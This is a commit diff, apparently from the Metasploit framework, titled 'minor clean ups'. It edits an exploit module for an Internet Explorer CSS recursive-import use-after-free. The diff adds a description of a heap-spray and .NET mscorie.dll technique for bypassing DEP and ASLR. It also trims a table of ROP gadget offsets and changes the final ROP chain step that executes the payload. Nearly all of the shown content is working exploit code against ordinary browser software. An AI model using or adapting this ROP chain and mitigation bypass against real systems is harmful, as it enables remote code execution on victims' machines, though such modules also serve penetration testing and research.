minor clean ups

git-svn-id: file:///home/svn/framework3/trunk@11397 4d416f70-5f16-0410-b530-b9f4589650da
2024-11-12 11:52:01 +01:00 · 2010-12-22 18:23:16 +00:00 · 2010-12-22 18:23:16 +00:00 · 44c8a71dcf
commit 44c8a71dcf
parent 1407d7f1d5
1 changed files with 7 additions and 6 deletions
--- a/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
+++ b/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
@ -33,6 +33,11 @@ class Metasploit3 < Msf::Exploit::Remote
 				HTML engine (mshtml). When parsing an HTML page containing a recursive CSS
 				import, a C++ object is deleted and later reused. This leads to arbitrary
 				code execution.
+
+				This exploit utilizes a combination of heap spraying and the
+				.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not
+				opt-in to ASLR. As such, this module should be reliable on all Windows
+				versions.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@ -288,6 +293,7 @@ EOS

 		elsif request.uri =~ /\.dll$/
 			print_status("Sending #{self.refname} DLL to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
+
 			# Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually
 			# use it's contents ...
 			ibase = (0x2000 | rand(0x8000)) << 16
@ -330,11 +336,7 @@ EOS
 			'xchg eax, esp / mov eax, [eax] / mov [esp], eax / ret' => 0x575b,
 			'leave / ret'            => 0x25e5,
 			'ret'                    => 0x25e5+1,
-			'mov eax, [eax] / ret'   => 0x22a2,
-			'mov [ecx], eax / xor eax, eax / pop esi / ret' => 0x360b9,
-
 			'call [ecx] / pop ebp / ret 0xc' => 0x1ec4,
-			'push eax / ret'         => 0x1d1e4,
 			'pop eax / ret'          => 0x5ba1,
 			'pop ebx / ret'          => 0x54c0,
 			'pop ecx / ret'          => 0x1e13,
@ -342,7 +344,6 @@ EOS
 			'pop edi / ret'          => 0x2212,
 			'mov [ecx], eax / mov al, 1 / pop ebp / ret 0xc' => 0x61f6,
 			'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret' => 0x6154,
-			'call [ecx]'             => 0x1ec4
 		}
 	end

@ -389,7 +390,7 @@ EOS
 			rop_stack << 'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret'
 		}
 		# Execute the payload ;)
-		rop_stack << 'call [ecx]'
+		rop_stack << 'call [ecx] / pop ebp / ret 0xc'

 		rop_stack.map! { |e|
 			if e.kind_of? String